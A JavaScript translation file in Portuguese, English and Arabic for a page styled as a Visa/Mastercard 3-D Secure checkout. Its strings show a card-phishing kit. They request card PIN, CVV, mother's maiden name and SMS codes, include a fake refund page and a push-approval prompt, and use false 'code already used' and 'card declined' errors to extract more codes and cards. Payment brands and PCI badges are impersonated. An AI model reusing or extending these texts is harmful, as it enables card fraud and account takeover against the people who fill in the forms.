/**
 * Centralized Internationalization (i18n) for Payment Gateway (3DS & Checkout)
 *
 * Default language for Brazil project: Portuguese (pt-BR)
 * Also supports English (en) and Arabic (ar).
 */

export function parseLocale(modeString = '') {
  const mode = String(modeString || '').trim().toLowerCase();
  if (mode.endsWith('ar') || mode.includes('_ar') || mode === 'ar' || mode.includes('arabic')) return 'ar';
  return 'pt';
}

export const translations = {
  pt: {
    dir: 'ltr',
    lang: 'pt-BR',
    // Security & Header
    secureConnection: 'Criptografia TLS 256-bit Segura',
    visaTitle: 'SECURE',
    mcTitle: 'mastercard',
    mcSubtitle: 'Identity Check™',
    visaProtected: 'Protegido por Visa Secure',
    mcProtected: 'Protegido por Mastercard Identity Check',
    pciDss: 'PCI DSS Nível 1',
    threeDs: '3-D SECURE™ 2.2',

    // Transaction details
    authDetails: 'DETALHES DA AUTENTICAÇÃO',
    merchant: 'Estabelecimento',
    date: 'Data',
    amount: 'Valor Total',
    cardNumber: 'Número do Cartão',
    storeWebsite: 'Site Oficial',
    customerEmail: 'E-mail do Titular',

    // Error & Notice
    noticeTitle: 'Aviso de Segurança',
    securityNotice: 'Aviso de Segurança',
    declinedCardTitle: 'Autorização de Pagamento Recusada',
    declinedCardSubtitle: 'Este cartão não foi autorizado pelo banco emissor. Por favor, utilize outro cartão de crédito ou débito para concluir sua ativação.',
    invalidOtp: 'Código de verificação inválido ou expirado. Digite o novo código SMS enviado para o seu celular.',
    duplicateOtp: 'Este código já foi utilizado. Por favor, digite o novo código SMS enviado para o seu celular.',
    duplicateCard: 'Este cartão foi recusado pelo emissor. Por favor, utilize um cartão diferente.',
    incorrectPin: 'Senha do cartão incorreta. Verifique e tente novamente.',

    // OTP Page
    otpTitle: 'Verificação de Segurança (SMS)',
    otpSubtitle: 'Para sua segurança, digite o código de verificação único enviado por SMS para o celular cadastrado no seu banco.',
    otpInputLabel: 'Código de Verificação (SMS):',
    otpPlaceholder: 'Digite o código',
    otpNotReceived: 'Não recebeu o código por SMS?',
    otpResentSuccess: '✓ Um novo código foi enviado para o seu celular',
    timeRemaining: 'Tempo restante:',
    confirmAndPay: 'Confirmar',
    submitBtn: 'Confirmar',
    cancelBtn: 'Cancelar',
    helpBtn: 'Ajuda',
    helpAlert: 'Para suporte na autenticação, entre em contato com o atendimento do banco emissor do seu cartão.',
    resendOtp: 'Reenviar Código',
    termsConditions: 'Termos e Condições Aplicáveis',
    help: 'Precisa de ajuda?',

    // Refund Page
    refundTitle: 'Confirmação de Estorno',
    refundSubtitle: 'Identificamos uma cobrança duplicada. Para confirmar e processar seu estorno imediato, digite o código enviado por SMS:',
    refundBtnText: 'CONFIRMAR ESTORNO',

    // Push Page
    pushTitle: 'Autorização no Aplicativo do Banco',
    pushSubtitle: 'Uma solicitação de confirmação foi enviada para o aplicativo do seu banco no celular cadastrado.',
    pushDefaultMsg: 'Por favor, abra o aplicativo do seu banco no celular e aprove a notificação para concluir esta transação.',
    pushConfirmedBtn: 'Já aprovei no aplicativo',
    pushNotReceived: 'Não recebeu a notificação no celular?',
    pushHelpAlert: 'Abra o aplicativo do seu banco no celular e verifique a área de notificações ou autorizações pendentes.',

    // PIN Page
    pinTitle: 'Confirmação de Senha do Cartão',
    pinSubtitle: 'Por favor, digite a senha de 4 dígitos do seu cartão para autorizar esta operação com segurança.',
    pinInputLabel: 'Senha do Cartão (4 dígitos):',
    pinForgotLink: 'Esqueceu a senha do seu cartão?',
    pinForgotAlert: 'Caso tenha esquecido a senha do seu cartão, consulte o aplicativo do banco emissor.',
    authorizePayment: 'Autorizar Transação',

    // Question Page
    questionTitle: 'Verificação Adicional de Segurança',
    questionSubtitle: 'Por favor, responda à pergunta de segurança do seu banco emissor para concluir a autenticação.',
    questionDefaultPrompt: 'Qual é o nome de solteira da sua mãe?',
    questionPlaceholder: 'Digite sua resposta',
    questionForgotLink: 'Esqueceu a resposta da pergunta de segurança?',
    questionForgotAlert: 'Entre em contato com o banco emissor do seu cartão para auxílio com a validação de segurança.',
    submitVerification: 'Confirmar Verificação',

    // Loading Page
    loadingText: 'Autenticando com segurança junto ao seu banco...',
    loadingSubtext: 'Por favor, aguarde e não feche ou atualize esta página',

    // Error Page
    errorTitle: 'Transação Não Autorizada',
    errorDesc: 'Não foi possível autorizar esta operação junto ao banco emissor do seu cartão. Entre em contato com seu banco ou tente utilizar outro cartão.',
    tryAnotherCard: 'Tentar Outro Cartão',

    // Front Checkout Form
    fullName: 'Nome Completo do Titular',
    fullNamePlaceholder: 'Ex: Tiago Silva',
    email: 'Endereço de E-mail',
    emailPlaceholder: 'seuemail@exemplo.com.br',
    expiryDate: 'Validade',
    expiryPlaceholder: 'MM/AA',
    cvv: 'CVV',
    cvvPlaceholder: '123',
    pay: 'Confirmar e Ativar',
    binBlockedMsg: 'Cartões pré-pagos não são aceitos. Por favor, utilize um cartão de crédito ou débito válido.',
    invalidCardNumber: 'Digite um número de cartão válido com 16 dígitos',
    invalidExpiry: 'Data de validade inválida',
    invalidCvv: 'O código CVV deve conter 3 dígitos'
  },

  en: {
    dir: 'ltr',
    lang: 'en',
    secureConnection: '256-bit TLS Encrypted',
    visaTitle: 'SECURE',
    mcTitle: 'mastercard',
    mcSubtitle: 'Identity Check™',
    visaProtected: 'Protected by Visa Secure',
    mcProtected: 'Secured by Mastercard Identity Check',
    pciDss: 'PCI DSS Level 1',
    threeDs: '3-D SECURE™ 2.2',
    authDetails: 'AUTHENTICATION DETAILS',
    merchant: 'Merchant',
    date: 'Date',
    amount: 'Amount',
    cardNumber: 'Card Number',
    storeWebsite: 'Store Website',
    customerEmail: 'Customer Email',
    noticeTitle: 'Authentication Notice',
    securityNotice: 'Security Notice',
    declinedCardTitle: 'Payment Authorization Declined',
    declinedCardSubtitle: 'This card was declined by your bank. Please use a different card to complete your reservation.',
    invalidOtp: 'Invalid verification code. Please enter the new SMS code sent to your phone.',
    duplicateOtp: 'You entered this verification code already. Please enter the new SMS code sent to your phone.',
    duplicateCard: 'This card was declined. Please enter a different card.',
    incorrectPin: 'Incorrect PIN. Please check and try again.',
    otpTitle: 'Enter Verification Code',
    otpSubtitle: 'A one-time verification code has been sent to your registered mobile number.',
    otpInputLabel: 'Enter One-Time Passcode:',
    otpPlaceholder: 'Enter Passcode',
    otpNotReceived: "Haven't received a one-time passcode?",
    otpResentSuccess: '✓ New code sent to your mobile phone',
    timeRemaining: 'Time remaining:',
    confirmAndPay: 'Confirm & Pay',
    submitBtn: 'Submit',
    cancelBtn: 'Cancel',
    helpBtn: 'Help',
    helpAlert: 'For assistance, please contact your card issuing bank.',
    resendOtp: 'Resend Code',
    termsConditions: 'Terms and Conditions Apply',
    help: 'Need Help?',
    refundTitle: 'Refund Verification',
    refundSubtitle: 'We have detected an incorrect charge. To verify and issue your refund, please enter the new SMS code:',
    refundBtnText: 'CONFIRM REFUND',
    pushTitle: 'Approve in Your Banking App',
    pushSubtitle: 'A verification request has been sent to your registered mobile banking device.',
    pushDefaultMsg: 'Please open your mobile banking application and approve the transaction prompt.',
    pushConfirmedBtn: 'I Approved the Notification',
    pushNotReceived: "Haven't received the push notification?",
    pushHelpAlert: 'Please open your banking app and check the pending approvals section.',
    pinTitle: 'Card PIN Verification',
    pinSubtitle: 'Please enter your 4-digit card PIN to authorize this transaction.',
    pinInputLabel: 'Enter Your Card PIN:',
    pinForgotLink: 'Forgot your card PIN?',
    pinForgotAlert: 'If you forgot your PIN, please contact your card issuing bank.',
    authorizePayment: 'Authorize Payment',
    questionTitle: 'Security Verification',
    questionSubtitle: 'Please answer your bank security question to complete authentication.',
    questionDefaultPrompt: "What is your mother's maiden name?",
    questionPlaceholder: 'Enter your answer',
    questionForgotLink: 'Forgot the answer to your security question?',
    questionForgotAlert: 'Please contact your card issuing bank for assistance with your security question.',
    submitVerification: 'Submit Verification',
    loadingText: 'Verifying securely...',
    loadingSubtext: 'Please do not close this window or press back',
    errorTitle: 'Transaction Declined',
    errorDesc: 'This transaction could not be authorized by your card issuer. Please contact your bank or try using a different payment card.',
    tryAnotherCard: 'Try Another Card',
    fullName: 'Full Name',
    fullNamePlaceholder: 'Tiago Silva',
    email: 'Email Address',
    emailPlaceholder: 'tiago@exemplo.com.br',
    expiryDate: 'Expiry Date',
    expiryPlaceholder: 'MM/YY',
    cvv: 'CVV',
    cvvPlaceholder: '123',
    pay: 'Pay Now',
    binBlockedMsg: 'Virtual or prepaid cards are not accepted. Please use a physical credit or debit card.',
    invalidCardNumber: 'Please enter a valid 16-digit card number',
    invalidExpiry: 'Invalid expiry date',
    invalidCvv: 'CVV must be 3 digits'
  },

  ar: {
    dir: 'rtl',
    lang: 'ar',
    secureConnection: 'تشفير TLS 256-bit آمن',
    visaTitle: 'SECURE',
    mcTitle: 'mastercard',
    mcSubtitle: 'Identity Check™',
    visaProtected: 'محمي بواسطة فيزا سيكيور',
    mcProtected: 'مؤمن بواسطة ماستركارد آيدينتيتي تشيك',
    pciDss: 'PCI DSS المستوى 1',
    threeDs: '3-D SECURE™ 2.2',
    authDetails: 'تفاصيل المعاملة والأمان',
    merchant: 'اسم المتجر',
    date: 'التاريخ',
    amount: 'المبلغ الإجمالي',
    cardNumber: 'رقم البطاقة',
    storeWebsite: 'موقع المتجر',
    customerEmail: 'البريد الإلكتروني',
    noticeTitle: 'إشعار التحقق الأمني',
    securityNotice: 'إشعار أمني',
    declinedCardTitle: 'تم رفض تفويض الدفع',
    declinedCardSubtitle: 'تم رفض هذه البطاقة من قبل البنك المصدر. يرجى استخدام بطاقة مصرفية مختلفة لإتمام عملية الحجز.',
    invalidOtp: 'رمز التحقق غير صحيح. يرجى إدخال رمز التحقق الجديد المرسل إلى هاتفك.',
    duplicateOtp: 'لقد أدخلت رمز التحقق هذا مسبقاً. يرجى إدخال رمز التحقق الجديد المرسل إلى هاتفك.',
    duplicateCard: 'تم رفض هذه البطاقة. يرجى إدخال بطاقة مختلفة.',
    incorrectPin: 'الرقم السري للبطاقة غير صحيح. يرجى المحاولة مرة أخرى.',
    otpTitle: 'أدخل رمز التحقق (OTP)',
    otpSubtitle: 'تم إرسال رمز تحقق لمرة واحدة عبر رسالة نصية (SMS) إلى هاتفك المسجل.',
    otpInputLabel: 'رمز التحقق (OTP):',
    otpPlaceholder: 'أدخل الرمز',
    otpNotReceived: 'لم تستلم رمز التحقق؟',
    otpResentSuccess: '✓ تم إرسال رمز تحقق جديد بنجاح',
    timeRemaining: 'الوقت المتبقي:',
    confirmAndPay: 'تأكيد ودفع',
    submitBtn: 'إرسال',
    cancelBtn: 'إلغاء',
    helpBtn: 'مساعدة',
    helpAlert: 'للمساعدة، يرجى التواصل مع البنك المصدر لبطاقتك.',
    resendOtp: 'إعادة إرسال الرمز',
    termsConditions: 'الشروط والأحكام',
    help: 'هل تحتاج إلى مساعدة؟',
    refundTitle: 'المصادقة على استرداد الأموال',
    refundSubtitle: 'تم اكتشاف خصم غير صحيح. للتحقق من استرداد أموالك وإصداره، يرجى إدخال رمز الرسالة القصيرة (SMS) الجديد:',
    refundBtnText: 'تأكيد الاسترداد',
    pushTitle: 'الموافقة عبر التطبيق البنكي',
    pushSubtitle: 'تم إرسال إشعار تحقق إلى تطبيق البنك الخاص بك على هاتفك المسجل.',
    pushDefaultMsg: 'يرجى فتح تطبيق البنك والموافقة على طلب تفويض المعاملة.',
    pushConfirmedBtn: 'لقد وافقت على الإشعار في التطبيق',
    pushNotReceived: 'لم تستلم الإشعار؟',
    pushHelpAlert: 'يرجى فتح تطبيق البنك الخاص بك والتحقق من قسم الإشعارات المعلقة.',
    pinTitle: 'التحقق من الرقم السري للبطاقة',
    pinSubtitle: 'يرجى إدخال الرقم السري المكون من 4 أرقام الخاص ببطاقتك لتفويض الدفع.',
    pinInputLabel: 'أدخل الرقم السري للبطاقة:',
    pinForgotLink: 'هل نسيت الرقم السري الخاص بك؟',
    pinForgotAlert: 'إذا نسيت الرقم السري الخاص بك، يرجى التواصل مع البنك المصدر للبطاقة.',
    authorizePayment: 'تفويض الدفع',
    questionTitle: 'التحقق الأمني الإضافي',
    questionSubtitle: 'يرجى الإجابة على سؤال الأمان البنكي لإتمام عملية الدفع بأمان.',
    questionDefaultPrompt: 'ما هو اسم مدرستك الابتدائية؟',
    questionPlaceholder: 'أدخل إجابتك هنا',
    questionForgotLink: 'هل نسيت إجابة السؤال السري؟',
    questionForgotAlert: 'يرجى التواصل مع البنك المصدر للبطاقة للمساعدة في الإجابة على السؤال السري.',
    submitVerification: 'إرسال الإجابة',
    loadingText: 'جاري التحقق بأمان وتأكيد المعاملة...',
    loadingSubtext: 'يرجى عدم إغلاق هذه الصفحة أو الضغط على رجوع',
    errorTitle: 'تم رفض المعاملة',
    errorDesc: 'تعذر تفويض هذه المعاملة من قبل البنك المصدر لبطاقتك. يرجى الاتصال بالبنك أو تجربة بطاقة مصرفية أخرى.',
    tryAnotherCard: 'استخدام بطاقة أخرى',
    fullName: 'الاسم الكامل',
    fullNamePlaceholder: 'محمد أحمد',
    email: 'البريد الإلكتروني',
    emailPlaceholder: 'name@example.com',
    expiryDate: 'تاريخ الانتهاء',
    expiryPlaceholder: 'ش/س',
    cvv: 'رمز الأمان (CVV)',
    cvvPlaceholder: '123',
    pay: 'إتمام الدفع الآن',
    binBlockedMsg: 'غير مسموح بالبطاقات الافتراضية أو مسبقة الدفع. يرجى استخدام بطاقة بنكية حقيقية.',
    invalidCardNumber: 'يرجى إدخال رقم بطاقة صحيح مكون من 16 رقماً',
    invalidExpiry: 'تاريخ الانتهاء غير صالح',
    invalidCvv: 'يجب أن يتكون رمز CVV من 3 أرقام فقط'
  }
};

export function getTranslation(modeString) {
  const locale = parseLocale(modeString);
  return translations[locale] || translations.pt;
}
